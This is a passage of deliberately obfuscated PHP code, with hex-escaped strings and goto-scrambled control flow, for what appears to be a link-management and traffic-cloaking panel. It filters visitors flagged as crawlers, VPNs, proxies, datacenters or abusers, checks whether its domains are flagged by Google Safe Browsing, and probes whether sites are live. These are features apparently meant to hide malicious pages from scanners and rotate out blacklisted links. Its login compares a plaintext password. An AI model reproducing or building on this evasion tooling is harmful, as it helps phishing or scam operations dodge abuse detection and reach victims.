"\x4d\151\x6e\151\155\x61\x6c\40\160\141\163\x73\167\157\x72\144\40\x6c\145\x6e\147\164\150\40\x69\x73\40\70\56";
goto C85ef;
e5281:
d746f:
goto Ee8df;
d9ad0:
$Dd8bd["\155\145\163\163\141\147\x65"] =
"\x4c\157\x67\x69\x6e\40\x73\165\x63\143\145\x73\x73\146\x75\154\x21";
goto F9817;
F0e10:
$E94e1 = $this->curl("\120\x4f\x53\124", $e4c7c, $F0196);
goto B409c;
Bc9ce:
goto ab583;
goto C215b;
D217d:
$config["\x70\x61\x73\163\167\x6f\162\x64"] = $Da3db;
goto a658d;
b69d7:
$Dd8bd["\x73\x74\141\164\x75\x73"] = "\x65\x72\x72\157\x72";
goto Eb51d;
b9487:
if (!$E94e1["\x65\x78\x70\x69\x72\x65\x64"]) {
goto f78bd;
}
goto C325f;
Ac5ed:
$Dd8bd["\163\x74\141\164\x75\x73"] = "\x65\x72\162\x6f\162";
goto ea404;
b363b:
if ($E94e1["\154\x69\x76\145"]) {
goto Dd5f4;
}
goto b69d7;
Eb51d:
$Dd8bd["\x6d\x65\x73\163\141\147\x65"] = $E94e1["\x65\x72\162\157\162"];
goto Ffa34;
Ffa34:
goto d746f;
goto C7731;
C0beb:
$Da3db = $this->escapeString($Da3db);
goto bd28b;
C7731:
Dd5f4:
goto b9487;
Ee8df:
a5f60:
goto a14f0;
a5821:
}
public function isStrongPassword($Da3db)
{
goto e379a;
Ab2bd:
if (!(strlen($Da3db) < $D8218)) {
goto b2bc4;
}
goto c706b;
e379a:
$D8218 = 8;
goto Ab2bd;
dff75:
b2bc4:
goto Bbca8;
c706b:
return false;
goto dff75;
Bbca8:
return true;
goto Db035;
Db035:
}
public function login($Da3db)
{
goto c5241;
E2696:
echo json_encode($Dd8bd);
goto ac5b9;
b091c:
$Dd8bd["\163\164\x61\164\x75\163"] = "\x65\162\x72\x6f\x72";
goto c3c3b;
F2f2e:
$Dd8bd["\x73\164\141\x74\165\x73"] = "\x73\x75\x63\x63\x65\163\x73";
goto a03ac;
ed45c:
$_SESSION["\154\157\x67\151\156"] = true;
goto f082e;
a03ac:
$Dd8bd["\155\x65\x73\x73\x61\x67\x65"] =
"\114\157\147\x69\156\x20\x73\165\x63\143\x65\x73\163\146\165\154\41";
goto ed45c;
c3c3b:
$Dd8bd["\155\x65\x73\x73\x61\147\x65"] =
"\x50\141\163\x73\167\157\x72\144\x20\151\x6e\143\157\x72\162\x65\143\164";
goto D2c29;
D2c29:
goto fd666;
goto D3825;
fda48:
if ($config["\x70\x61\163\x73\167\157\162\144"] == $Da3db) {
goto Bd688;
}
goto b091c;
c5241:
$Da3db = $this->escapeString($Da3db);
goto b5b9e;
b5b9e:
$config = require "\56\x2e\x2f\x63\157\x6e\x66\151\147\x2e\x70\150\x70";
goto fda48;
D3825:
Bd688:
goto F2f2e;
f082e:
fd666:
goto E2696;
ac5b9:
}
public function getFullUrl()
{
goto C5ab6;
C5ab6:
$caee4 =
!empty($_SERVER["\x48\124\x54\120\x53"]) &&
$_SERVER["\x48\x54\x54\x50\x53"] !== "\x6f\146\146"
? "\x68\x74\164\160\163\x3a\x2f\57"
: "\x68\x74\x74\x70\72\57\57";
goto b72ae;
B2528:
return $e717d;
goto d05d1;
b72ae:
$e717d =
$caee4 .
$_SERVER["\x48\124\x54\120\x5f\110\x4f\123\x54"] .
$_SERVER["\122\105\x51\125\x45\x53\124\137\x55\122\x49"];
goto B2528;
d05d1:
}
public function generateRandomString($ef6e8 = 10)
{
return substr(
str_shuffle(
str_repeat(
$Ec4bd =
"\x61\142\143\144\x65\146\x67\150\151\152\153\x6c\157\x6d\156\157\x70\x71\x72\163\164\165\166\x77\x78\x79\172\x41\102\x43\104\105\x46\x47\110\x49\x4a\113\114\115\116\x4f\x50\x51\122\123\124\x55\x56\x57\x58\131\132\x30\x31\x32\x33\64\x35\x36\x37\70\x39",
ceil($ef6e8 / strlen($Ec4bd))
)
),
1,
$ef6e8
);
}
public function removeLastTwoDirectories($e4c7c)
{
goto D1f9e;
E9be2:
if (!isset($Cd664["\161\165\x65\162\x79"])) {
goto C748a;
}
goto D8bf7;
cda3d:
$c736b = explode("\57", trim($Cd664["\160\141\x74\x68"], "\x2f"));
goto a2edb;
e2dd0:
$Fcfd2 =
(isset($Cd664["\x73\143\150\x65\x6d\x65"])
? $Cd664["\163\x63\x68\x65\155\145"] . "\72\57\57"
: "") .
(isset($Cd664["\150\x6f\x73\164"])
? $Cd664["\x68\x6f\163\164"]
: "") .
$E8de1;
goto E9be2;
D1f9e:
$Cd664 = parse_url($e4c7c);
goto cda3d;
d063b:
C748a:
goto cc4a1;
cc4a1:
return $Fcfd2;
goto cd26e;
D8bf7:
$Fcfd2 .= "\x3f" . $Cd664["\x71\165\145\162\x79"];
goto d063b;
B4c6d:
$E8de1 = "\57" . implode("\x2f", $b469f);
goto e2dd0;
a2edb:
$b469f = array_slice($c736b, 0, -2);
goto B4c6d;
cd26e:
}
public function logout()
{
goto E6786;
E6786:
if (!isset($_SESSION["\x6c\157\x67\151\x6e"])) {
goto c3cb3;
}
goto ff53f;
ba3df:
c3cb3:
goto f0d92;
ff53f:
session_destroy();
goto ba3df;
f0d92:
}
public function check()
{
goto D213c;
e34b5:
b1b53:
goto Ca3a2;
Aa460:
die();
goto e34b5;
Aefde:
header("\x4c\157\x63\x61\x74\151\157\156\x3a\x20\154\157\147\151\x6e");
goto Aa460;
D213c:
if (isset($_SESSION["\x6c\157\x67\151\x6e"])) {
goto b1b53;
}
goto Aefde;
Ca3a2:
}
public function curl($D0c42, $e4c7c, $F0196 = "")
{
goto a2532;
D13fd:
curl_setopt($cabdd, CURLOPT_RETURNTRANSFER, true);
goto Ada2e;
Aa492:
curl_setopt($cabdd, CURLOPT_URL, $e4c7c);
goto a5d43;
Ada2e:
$E94e1 = curl_exec($cabdd);
goto B2d82;
A26f4:
A5171:
goto ddd82;
B2d82:
if (!($E94e1 === false)) {
goto A5171;
}
goto Ce4bc;
ddd82:
curl_close($cabdd);
goto B30a7;
dbbb2:
eb62d:
goto D13fd;
Fc780:
curl_setopt($cabdd, CURLOPT_POSTFIELDS, http_build_query($F0196));
goto dbbb2;
a5d43:
if (!($D0c42 == "\x50\x4f\x53\124")) {
goto eb62d;
}
goto D717a;
D717a:
curl_setopt($cabdd, CURLOPT_POST, true);
goto Fc780;
B30a7:
return $E94e1;
goto Db47e;
Ce4bc:
echo "\x63\125\122\x4c\x20\x65\x72\162\157\x72\72\40" .
curl_error($cabdd);
goto A26f4;
a2532:
$cabdd = curl_init();
goto Aa492;
Db47e:
}
public function getServerIp()
{
goto D5ce4;
E731a:
return $E94e1["\151\x70"];
goto ef121;
C8286:
$E94e1 = json_decode($E94e1, true);
goto E731a;
D5ce4:
$e4c7c = $this->da22e;
goto C606e;
C606e:
$E94e1 = $this->curl("\107\x45\124", $e4c7c, "");
goto C8286;
ef121:
}
private function escapeString($d8a8a)
{
goto d279a;
b2af9:
return $d8a8a;
goto Ad4b5;
Ecb16:
$d8a8a = str_replace("\74", "", $d8a8a);
goto aeeb4;
aeeb4:
$d8a8a = str_replace("\x27", "", $d8a8a);
goto b2af9;
d279a:
$d8a8a = htmlspecialchars(
strip_tags($d8a8a),
ENT_QUOTES,
"\x55\124\106\x2d\x38"
);
goto Ecb16;
Ad4b5:
}
public function readJsonVisitFile($config, $af19a)
{
goto a8807;
d6433:
$Ea8c8 =
$E4e50 .
"\57\x2e\56\x2f" .
$config["\146\x69\x6c\x65\163"]["\166\x69\163\151\164"];
goto Cf7bb;
c4598:
C4f52:
goto d969a;
dc9a5:
$bedb2["\144\x61\x74\x61"] = [];
goto bc540;
Cff79:
$bedb2["\x64\162\141\x77"] = 1;
goto f804e;
c40ed:
$f1283 = file_get_contents($Ea8c8);
goto b239b;
a8807:
$E4e50 = dirname(__FILE__);
goto b0c3c;
Bdefe:
$bedb2[
"\x72\x65\143\x6f\162\x64\163\106\x69\154\x74\x65\x72\x65\144"
] = 0;
goto e558f;
d9223:
return is_array($bedb2) ? $bedb2 : [];
goto Cb3b4;
f804e:
$bedb2["\162\x65\x63\157\x72\x64\x73\124\x6f\x74\141\154"] = 0;
goto Bdefe;
bdfc4:
ae888:
goto c40ed;
b239b:
$F0196 = json_decode($f1283, true);
goto Cff79;
Cf7bb:
adfe9:
goto eb08e;
A6990:
foreach ($F0196 as $A72ac) {
goto b5c4f;
F689e:
$bedb2["\142\x6f\x74\x43\x6f\165\x6e\x74"]++;
goto d6944;
b5c4f:
$A72ac = $this->checkUserSecurity($config, $A72ac);
goto Fc247;
Fc247:
if (!$A72ac["\x69\156\146\157"]["\x69\163\137\x62\157\164"]) {
goto Bfc1f;
}
goto F689e;
d6944:
Bfc1f:
goto f4ce7;
f4ce7:
$b36a6 = array_merge($A72ac, $A72ac["\151\156\x66\x6f"]);
goto Cc1f1;
E0a45:
$bedb2["\x72\145\x63\157\162\144\163\x54\x6f\x74\x61\x6c"]++;
goto Adea4;
Cc1f1:
unset($b36a6["\151\x6e\x66\157"]);
goto bbb17;
bbb17:
$bedb2["\x64\141\164\141"][
$bedb2["\162\145\x63\157\162\144\163\x54\157\x74\x61\x6c"]
] = $b36a6;
goto E0a45;
Adea4:
f1879:
goto C4ea1;
C4ea1:
}
goto c4598;
bc540:
if (!is_array($F0196)) {
goto C86d4;
}
goto A6990;
eb08e:
if (file_exists($Ea8c8)) {
goto ae888;
}
goto Da60b;
Da60b:
file_put_contents($Ea8c8, json_encode([]));
goto d0128;
e558f:
$bedb2["\142\157\164\103\157\165\x6e\164"] = 0;
goto dc9a5;
d0128:
return [];
goto bdfc4;
d969a:
C86d4:
goto d9223;
b0c3c:
if (!($af19a == "\166\x69\x73\151\x74")) {
goto adfe9;
}
goto d6433;
Cb3b4:
}
public function checkUserSecurity($config, $bedb2)
{
goto F3dd2;
B461a:
be221:
goto F867d;
dab3f:
if (
$bedb2["\151\x6e\x66\x6f"][
"\x69\163\x5f\144\x61\164\141\x63\145\x6e\x74\145\162"
] != false &&
$config["\x62\x6f\x74"][
"\x64\141\x74\x61\143\x65\156\164\145\x72"
] == 2
) {
goto E906d;
}
goto efdab;
e6fad:
if (
!(
$config["\x62\157\164"]["\x70\162\x6f\170\171"] == 1 &&
$bedb2["\151\156\146\x6f"]["\x69\x73\137\x70\x72\157\170\171"]
)
) {
goto e0b39;
}
goto e0f8c;
Cbd52:
e0499:
goto E7f8c;
D5876:
e0b39:
goto ca76e;
E2d51:
$bedb2["\151\x6e\x66\x6f"]["\151\x73\x5f\x62\x6f\164"] = true;
goto d02b1;
efdab:
if (
!(
$bedb2["\151\156\x66\x6f"][
"\151\x73\x5f\144\x61\x74\141\143\145\x6e\x74\145\162"
] != false &&
$config["\x62\157\164"][
"\144\141\x74\141\143\x65\x6e\164\145\162"
] == 1 &&
$bedb2["\x69\x6e\146\x6f"][
"\x69\163\x5f\142\154\x6f\x63\x6b\145\144\x5f\144\141\x74\x61\143\145\x6e\x74\145\x72"
] == true
)
) {
goto D3a36;
}
goto Ec711;
F867d:
F3df0:
goto fd207;
B30cf:
if (
!(
$config["\142\157\x74"]["\x63\162\141\167\154\145\162"] == 1 &&
$bedb2["\x69\x6e\146\157"][
"\x69\163\x5f\x63\162\141\167\x6c\x65\x72"
]
)
) {
goto E4982;
}
goto D7f0c;
D7f0c:
$bedb2["\151\x6e\146\x6f"]["\x69\x73\x5f\x62\157\x74"] = true;
goto E73cf;
B3783:
if (
!(
$config["\x62\157\x74"][
"\x64\x61\x74\141\143\x65\156\x74\x65\x72"
] != 0
)
) {
goto F3df0;
}
goto dab3f;
d02b1:
C7a42:
goto Cbd52;
fd207:
if (
!(
$config["\142\x6f\x74"]["\166\160\156"] == 1 &&
$bedb2["\x69\156\146\x6f"]["\151\163\137\166\x70\156"]
)
) {
goto c0cb4;
}
goto Ffed9;
Ec711:
$bedb2["\x69\156\x66\x6f"]["\x69\x73\x5f\142\157\x74"] = true;
goto d3f7f;
Ebbdc:
goto be221;
goto e898d;
Ffed9:
$bedb2["\x69\x6e\x66\x6f"]["\x69\x73\x5f\x62\157\x74"] = true;
goto A4f50;
ee939:
if (!$bedb2["\x69\x6e\x66\157"]["\x73\x74\x61\164\x75\x73"]) {
goto e0499;
}
goto B30cf;
E7f8c:
return $bedb2;
goto fd61b;
E73cf:
E4982:
goto B3783;
d3f7f:
D3a36:
goto Ebbdc;
D7a51:
$bedb2["\x69\156\146\157"]["\x69\163\137\142\x6f\x74"] = true;
goto B461a;
e0f8c:
$bedb2["\151\x6e\146\157"]["\x69\163\x5f\142\x6f\x74"] = true;
goto D5876;
e898d:
E906d:
goto D7a51;
A4f50:
c0cb4:
goto e6fad;
F3dd2:
$bedb2["\x69\156\x66\157"]["\151\163\137\x62\157\x74"] = false;
goto ee939;
ca76e:
if (
!(
$config["\142\157\x74"]["\x61\x62\165\x73\145\x72"] == 1 &&
$bedb2["\x69\156\x66\157"][
"\151\163\x5f\x61\x62\x75\163\x65\162"
]
)
) {
goto C7a42;
}
goto E2d51;
fd61b:
}
public function readJsonFile($Ea8c8)
{
goto ff15a;
cca58:
$f1283 = file_get_contents($Ea8c8);
goto d5249;
bafc9:
return is_array($F0196) ? $F0196 : [];
goto cb17f;
d5249:
$F0196 = json_decode($f1283, true);
goto bafc9;
Ef514:
A8532:
goto cca58;
B31dd:
return [];
goto Ef514;
B1b4c:
file_put_contents($Ea8c8, json_encode([]));
goto B31dd;
ff15a:
if (file_exists($Ea8c8)) {
goto A8532;
}
goto B1b4c;
cb17f:
}
public function writeJsonFile($Ea8c8, $F0196)
{
$f1283 = json_encode($F0196, JSON_PRETTY_PRINT);
file_put_contents($Ea8c8, $f1283);
}
public function getFirstDataByIp($F0196, $cd5aa)
{
goto e7883;
e7883:
foreach ($F0196 as $Ac81f) {
goto c3810;
C6154:
B6190:
goto d6926;
B1288:
df6a9:
goto C6154;
d116d:
return $Ac81f;
goto B1288;
c3810:
if (!(isset($Ac81f["\151\x70"]) && $Ac81f["\151\x70"] === $cd5aa)) {
goto df6a9;
}
goto d116d;
d6926:
}
goto Cbd87;
Cbd87:
E9767:
goto be09e;
be09e:
return null;
goto afb81;
afb81:
}
public function generatePrimaryId($F0196)
{
goto b13b7;
E020c:
foreach ($F0196 as $Ac81f) {
goto b5ad2;
D3f09:
Ee51c:
goto d4f28;
d4f28:
Fcd4f:
goto ca74d;
b5ad2:
if (!(isset($Ac81f["\x69\x64"]) && $Ac81f["\x69\x64"] > $Ea3d9)) {
goto Ee51c;
}
goto Ac56d;
Ac56d:
$Ea3d9 = $Ac81f["\151\x64"];
goto D3f09;
ca74d:
}
goto A917b;
A917b:
d6f2a:
goto C693d;
b13b7:
$Ea3d9 = 0;
goto E020c;
C693d:
return $Ea3d9 + 1;
goto Dbddd;
Dbddd:
}
public function isDataExist($F0196, $F6ca6)
{
goto bfd29;
Efc6d:
return false;
goto f1547;
bfd29:
foreach ($F0196 as $Ac81f) {
goto D7ae6;
bb304:
e2ccb:
goto Bafae;
Bafae:
acbc5:
goto f6ce7;
F00be:
return true;
goto bb304;
D7ae6:
if (
!(
isset($Ac81f["\154\151\x6e\x6b"]) &&
$Ac81f["\x6c\151\156\x6b"] === $F6ca6
)
) {
goto e2ccb;
}
goto F00be;
f6ce7:
}
goto bf151;
bf151:
C8add:
goto Efc6d;
f1547:
}
public function edit_link($f219b, $F6ca6, $E7d19)
{
goto b8d64;
Fd09c:
$bedb2["\163\164\141\x74\x75\x73"] = false;
goto B5f3f;
B5f3f:
$bedb2["\162\x65\141\163\x6f\156"] =
"\114\151\x6e\x6b\x20\156\x6f\x74\x20\x66\x6f\x75\x6e\x64";
goto Aa304;
a5402:
$Ea8c8 =
$E4e50 .
"\57\x2e\56\57\x6c\x6f\x67\57\154\x69\156\153\56\x6a\163\157\x6e";
goto D82ac;
f14ca:
$bedb2["\x73\x74\x61\164\x75\163"] = true;
goto df8f9;
a0933:
$F0196[$F220c]["\154\x69\x6e\153"] = $F6ca6;
goto E1c36;
f1271:
return;
goto deaab;
df8f9:
$E4e50 = dirname(__FILE__);
goto a5402;
Aa304:
echo json_encode($bedb2);
goto f1271;
D681f:
echo json_encode($bedb2);
goto F3a6a;
edd95:
$F220c = array_search($f219b, array_column($F0196, "\x69\144"));
goto c1512;
E1c20:
$this->writeJsonFile($Ea8c8, $F0196);
goto D681f;
F3a6a:
exit();
goto ca5c6;
D82ac:
$F0196 = $this->readJsonFile($Ea8c8);
goto edd95;
deaab:
D2c81:
goto a0933;
b8d64:
header(
"\103\x6f\x6e\164\x65\x6e\x74\x2d\x54\171\160\145\72\x20\141\160\x70\154\151\x63\x61\164\151\x6f\x6e\57\152\163\x6f\156"
);
goto f14ca;
E1c36:
$F0196[$F220c]["\x66\157\x72\x6d\141\164"] = $E7d19;
goto E1c20;
c1512:
if (!($F220c === false)) {
goto D2c81;
}
goto Fd09c;
ca5c6:
}
public function add_link($F6ca6, $E7d19)
{
goto Ef35e;
f401b:
$e413b["\154\151\156\x6b"] = $F6ca6;
goto C2fad;
Ba216:
echo json_encode($bedb2);
goto b715b;
b3550:
$bedb2["\x69\x64"] = $e413b["\151\144"];
goto ade2a;
B4c41:
$F0196 = $this->readJsonFile($Ea8c8);
goto e883f;
C88e1:
exit();
goto Fe431;
d278e:
$bedb2["\x72\x65\x61\x73\x6f\156"] =
"\x4c\x69\x6e\153\40\x61\x6c\162\x65\x61\x64\x79\40\145\x78\x69\x73\164\x73";
goto Ba216;
b715b:
return;
goto bf345;
Bea98:
$Ea8c8 =
$E4e50 .
"\57\x2e\56\x2f\154\157\147\x2f\154\151\x6e\153\56\x6a\163\157\x6e";
goto B4c41;
dd0c5:
$F0196[] = $e413b;
goto b3550;
Fbca2:
$e413b["\151\144"] = $this->generatePrimaryId($F0196);
goto f401b;
bf345:
a302d:
goto Fbca2;
f8015:
$bedb2["\163\164\x61\164\165\x73"] = false;
goto d278e;
Ef35e:
header(
"\x43\157\156\164\145\x6e\x74\x2d\124\x79\160\145\x3a\40\141\160\160\154\x69\x63\x61\x74\x69\x6f\156\x2f\x6a\163\157\x6e"
);
goto d2d76;
C2fad:
$e413b["\x66\157\162\x6d\x61\164"] = $E7d19;
goto dd0c5;
A7fd7:
$E4e50 = dirname(__FILE__);
goto Bea98;
d2d76:
$bedb2["\x73\x74\141\164\x75\163"] = true;
goto A7fd7;
ade2a:
$this->writeJsonFile($Ea8c8, $F0196);
goto c7cde;
e883f:
if (!$this->isDataExist($F0196, $F6ca6)) {
goto a302d;
}
goto f8015;
c7cde:
echo json_encode($bedb2);
goto C88e1;
Fe431:
}
public function delete_link($f219b)
{
goto f4e11;
f053d:
echo json_encode($bedb2);
goto F22b4;
ea767:
$bedb2["\x72\145\141\x73\157\x6e"] =
"\x4c\151\156\153\x20\x64\157\x65\163\40\156\x6f\164\40\145\170\151\163\x74";
goto f053d;
Feba6:
if ($d8aad) {
goto b793e;
}
goto C71bd;
e4394:
$Ea8c8 =
$E4e50 .
"\x2f\56\56\x2f\x6c\x6f\x67\57\154\151\x6e\153\x2e\x6a\x73\x6f\156";
goto E5b45;
D84c2:
$F0196 = array_values($F0196);
goto a34b3;
a34b3:
$this->writeJsonFile($Ea8c8, $F0196);
goto dca3e;
Fe8e8:
Fa4b6:
goto Feba6;
a1346:
b793e:
goto D84c2;
a97b1:
die();
goto c4f52;
bc0e2:
$bedb2["\163\164\141\x74\165\x73"] = true;
goto Ccc53;
F22b4:
die();
goto a1346;
C8053:
foreach ($F0196 as $F0ce7 => $Ac81f) {
goto F7f27;
F7f27:
if (!($Ac81f["\x69\144"] == $f219b)) {
goto C3087;
}
goto e097a;
A86f4:
goto Fa4b6;
goto Aa7c4;
f3042:
f694c:
goto e224b;
Aa7c4:
C3087:
goto f3042;
F5546:
unset($F0196[$F0ce7]);
goto A86f4;
e097a:
$d8aad = true;
goto F5546;
e224b:
}
goto Fe8e8;
Ccc53:
$E4e50 = dirname(__FILE__);
goto e4394;
f4e11:
header(
"\x43\x6f\x6e\164\x65\156\164\55\124\171\x70\145\x3a\40\141\x70\x70\154\x69\143\x61\164\x69\157\156\57\x6a\x73\x6f\x6e"
);
goto bc0e2;
E5b45:
$F0196 = $this->readJsonFile($Ea8c8);
goto a8726;
a8726:
$d8aad = false;
goto C8053;
C71bd:
$bedb2["\x73\164\x61\x74\165\x73"] = false;
goto ea767;
dca3e:
echo json_encode($bedb2);
goto a97b1;
c4f52:
}
public function getLink($Cc75e)
{
goto E43b9;
Eb4d4:
return $Edaf0;
goto b983d;
F2279:
Ebc14:
goto edbd2;
cb468:
foreach ($F98fd as $acba1) {
goto df8d6;
df8d6:
if (!isset($acba1["\154\151\156\153"])) {
goto ee9b1;
}
goto c7782;
d4e74:
ee9b1:
goto b5c69;
b5c69:
f4f4b:
goto Eda85;
c7782:
$Edaf0[] = $acba1["\154\151\156\153"];
goto d4e74;
Eda85:
}
goto Cfb6b;
a1c3b:
die(
"\105\162\x72\157\162\x20\x72\x65\141\x64\x69\156\147\40\164\x68\145\40\112\x53\117\116\x20\146\x69\x6c\145\x2e"
);
goto B35be;
b9f57:
c8629:
goto F19fa;
edbd2:
$Edaf0 = [];
goto cb468;
B56d8:
return [];
goto b9f57;
Ab79a:
if (!($c466a === false)) {
goto Da594;
}
goto a1c3b;
B35be:
Da594:
goto Cd989;
Cd989:
if (!(trim($c466a) === "")) {
goto c8629;
}
goto B56d8;
B73ab:
if (!(json_last_error() !== JSON_ERROR_NONE)) {
goto C25cd;
}
goto Cfb55;
Ed13e:
C25cd:
goto Fc26d;
Fc26d:
if (is_array($F98fd)) {
goto Ebc14;
}
goto ec654;
Cfb55:
die(
"\105\162\x72\157\x72\40\144\145\143\157\x64\151\156\147\40\x4a\123\117\x4e\72\x20" .
json_last_error_msg()
);
goto Ed13e;
b2db4:
$c466a = file_get_contents($D2229);
goto Ab79a;
F19fa:
$F98fd = json_decode($c466a, true);
goto B73ab;
ec654:
die(
"\105\x72\x72\157\162\72\40\x54\x68\x65\40\x64\x65\143\x6f\x64\145\144\40\112\123\x4f\116\40\151\x73\x20\x6e\157\x74\40\x61\156\40\x61\x72\x72\141\x79\x2e"
);
goto F2279;
E43b9:
$D2229 = $Cc75e;
goto b2db4;
Cfb6b:
b7b90:
goto Eb4d4;
b983d:
}
public function redflag_check($e4c7c)
{
goto a3a84;
Bb09a:
return strpos($E94e1, "\133\133\42\163\x62\56\x73\x73\162\42\54\61") ===
false;
goto D8f76;
a3a84:
$e4c7c =
"\150\164\x74\160\163\x3a\57\57\x74\x72\141\x6e\163\x70\x61\x72\145\x6e\143\x79\x72\x65\160\157\162\164\56\x67\x6f\x6f\x67\154\145\56\143\157\155\57\x74\x72\141\156\163\160\x61\162\x65\x6e\143\x79\x72\x65\x70\x6f\162\x74\57\x61\x70\x69\x2f\166\x33\x2f\x73\x61\x66\145\x62\x72\157\167\x73\151\x6e\147\57\163\x74\x61\x74\x75\x73\x3f\163\x69\x74\145\x3d" .
$e4c7c;
goto e9f42;
e9f42:
$E94e1 = $this->curl("\x47\x45\x54", $e4c7c);
goto Bb09a;
D8f76:
}
function isSiteActive($e4c7c)
{
goto Ccdf9;
d257d:
curl_setopt($cabdd, CURLOPT_RETURNTRANSFER, true);
goto f22dd;
A6e87:
curl_setopt($cabdd, CURLOPT_NOBODY, true);
goto d257d;
F382b:
$ad294 = curl_getinfo($cabdd, CURLINFO_HTTP_CODE);
goto Ae53b;
Ccdf9:
$cabdd = curl_init($e4c7c);
goto A6e87;
Ddee3:
curl_setopt($cabdd, CURLOPT_FOLLOWLOCATION, true);
goto deddd;
f22dd:
curl_setopt($cabdd, CURLOPT_TIMEOUT, 10);
goto Ddee3;
Ae53b:
curl_close($cabdd);
goto A4d84;
deddd:
curl_exec($cabdd);
goto F382b;
A4d84:
return $ad294 >= 200 && $ad294 < 400;
goto d7323;
d7323:
}
public function getCountry()
{
$d55f1 = [
"\x41\x46" => "\x41\146\147\150\x61\156\x69\163\164\141\156",
"\101\114" => "\101\x6c\x62\141\x6e\x69\x61",
"\x44\x5a" => "\101\x6c\x67\145\162\x69\x61",
"\x41\x44" => "\101\x6e\144\x6f\162\x72\141",
"\x41\117" => "\x41\x6e\147\157\x6c\141",
"\x41\x47" =>
"\x41\x6e\x74\151\147\165\141\40\141\x6e\x64\40\102\x61\162\x62\x75\x64\x61",
"\101\122" => "\x41\162\147\x65\x6e\164\x69\x6e\141",
"\101\115" => "\101\x72\x6d\145\156\x69\141",
"\101\125" => "\x41\x75\x73\164\162\x61\154\151\x61",
"\x41\x54" => "\x41\x75\163\164\162\x69\x61",
"\101\x5a" => "\101\172\x65\162\x62\141\151\152\x61\156",
"\102\x53" => "\x42\x61\150\141\155\x61\163",
"\x42\x48" => "\x42\141\x68\x72\141\x69\156",
"\102\x44" => "\x42\141\x6e\x67\x6c\x61\144\x65\163\150",
"\102\102" => "\x42\141\x72\x62\141\144\x6f\163",
"\102\x59" => "\x42\x65\x6c\x61\x72\x75\x73",
"\x42\105" => "\x42\145\154\x67\151\165\155",
"\x42\132" => "\x42\x65\x6c\x69\x7a\x65",
"\102\112" => "\102\145\x6e\151\x6e",
"\x42\x54" => "\102\x68\165\164\141\x6e",
"\102\117" => "\102\x6f\154\151\x76\151\141",
"\x42\101" =>
"\x42\157\163\x6e\x69\x61\40\141\x6e\144\x20\110\x65\162\172\145\147\157\166\x69\x6e\x61",
"\102\x57" => "\102\157\164\x73\x77\x61\x6e\x61",
"\x42\x52" => "\102\x72\141\172\x69\154",
"\x42\116" => "\102\x72\165\x6e\145\x69",
"\x42\x47" => "\102\165\154\x67\141\162\151\x61",
"\x42\x46" => "\x42\x75\x72\153\x69\x6e\141\x20\x46\141\x73\x6f",
"\x42\111" => "\x42\165\x72\165\x6e\x64\151",
"\x43\x56" => "\x43\x61\x62\157\40\126\145\162\144\x65",
"\x4b\110" => "\x43\x61\155\142\157\144\151\141",
"\x43\115" => "\x43\141\x6d\145\162\157\157\x6e",
"\x43\x41" => "\103\141\156\141\x64\141",
"\103\x46" =>
"\x43\145\x6e\x74\162\x61\154\x20\101\146\x72\151\143\141\x6e\x20\122\145\x70\165\142\x6c\151\143",
"\x54\104" => "\103\150\141\x64",
"\x43\x4c" => "\103\150\x69\x6c\x65",
"\103\116" => "\x43\150\151\156\141",
"\x43\117" => "\103\x6f\x6c\x6f\155\142\x69\x61",
"\x4b\x4d" => "\103\x6f\x6d\x6f\x72\x6f\163",
"\103\x44" =>
"\103\x6f\x6e\147\157\x2c\x20\104\145\155\157\x63\162\141\164\x69\x63\40\x52\145\x70\165\142\x6c\x69\143\40\x6f\146\x20\164\150\145",
"\x43\107" =>
"\x43\157\x6e\x67\157\x2c\x20\122\x65\x70\165\142\x6c\151\143\x20\x6f\x66\x20\164\150\x65",
"\x43\122" => "\x43\157\x73\164\x61\40\122\151\143\x61",
"\x48\x52" => "\x43\x72\x6f\141\164\151\x61",
"\103\x55" => "\x43\165\x62\x61",
"\x43\x59" => "\103\171\x70\162\165\163",
"\x43\132" =>
"\103\172\x65\143\x68\x20\x52\x65\x70\165\142\x6c\x69\143",
"\104\113" => "\104\145\156\155\141\x72\153",
"\x44\x4a" => "\104\x6a\x69\142\157\165\x74\x69",
"\104\x4d" => "\104\157\155\x69\x6e\151\143\x61",
"\x44\117" =>
"\104\157\x6d\151\x6e\151\143\141\x6e\x20\122\145\x70\x75\x62\154\151\x63",
"\x45\x43" => "\105\x63\x75\x61\x64\x6f\162",
"\x45\107" => "\x45\x67\171\160\x74",
"\123\x56" => "\x45\x6c\x20\x53\141\154\x76\x61\144\157\162",
"\x47\121" =>
"\105\x71\165\141\x74\157\x72\x69\x61\x6c\40\x47\165\x69\156\145\141",
"\105\122" => "\x45\x72\x69\164\x72\145\x61",
"\x45\x45" => "\x45\163\x74\x6f\156\x69\141",
"\123\132" => "\x45\163\x77\x61\x74\151\156\151",
"\x45\124" => "\x45\x74\x68\x69\157\160\151\141",
"\x46\x4a" => "\106\x69\152\x69",
"\106\x49" => "\106\x69\x6e\x6c\x61\156\x64",
"\x46\x52" => "\106\162\x61\x6e\143\x65",
"\x47\x41" => "\x47\141\x62\x6f\x6e",
"\x47\x4d" => "\107\x61\155\142\151\x61",
"\x47\x45" => "\x47\x65\157\x72\x67\151\141",
"\104\x45" => "\x47\x65\162\155\141\156\x79",
"\107\x48" => "\107\150\141\x6e\x61",
"\107\122" => "\107\162\145\x65\143\145",
"\x47\x44" => "\107\x72\145\x6e\141\144\141",
"\x47\x54" => "\107\165\141\x74\145\155\141\x6c\141",
"\x47\116" => "\107\x75\151\x6e\145\x61",
"\107\127" => "\x47\165\151\156\x65\141\55\x42\x69\163\x73\141\x75",
"\107\131" => "\x47\165\x79\x61\156\141",
"\x48\124" => "\x48\x61\x69\164\x69",
"\x48\116" => "\110\157\156\144\x75\162\141\x73",
"\110\x55" => "\x48\165\x6e\x67\141\x72\x79",
"\x49\x53" => "\111\143\145\154\x61\x6e\144",
"\x49\x4e" => "\111\156\x64\151\141",
"\111\104" => "\111\x6e\x64\157\156\x65\163\x69\141",
"\111\x52" => "\x49\162\x61\x6e",
"\x49\x51" => "\111\162\141\161",
"\111\x45" => "\x49\162\x65\154\x61\156\x64",
"\111\114" => "\111\x73\162\x61\x65\154",
"\x49\x54" => "\x49\164\141\x6c\x79",
"\x4a\x4d" => "\x4a\x61\155\141\151\143\x61",
"\112\120" => "\x4a\x61\x70\x61\x6e",
"\x4a\105" => "\x4a\x65\x72\163\145\171",
"\x4a\x4f" => "\112\x6f\162\144\141\156",
"\x4b\x5a" => "\x4b\141\x7a\141\153\150\163\164\141\156",
"\x4b\x45" => "\x4b\x65\x6e\171\x61",
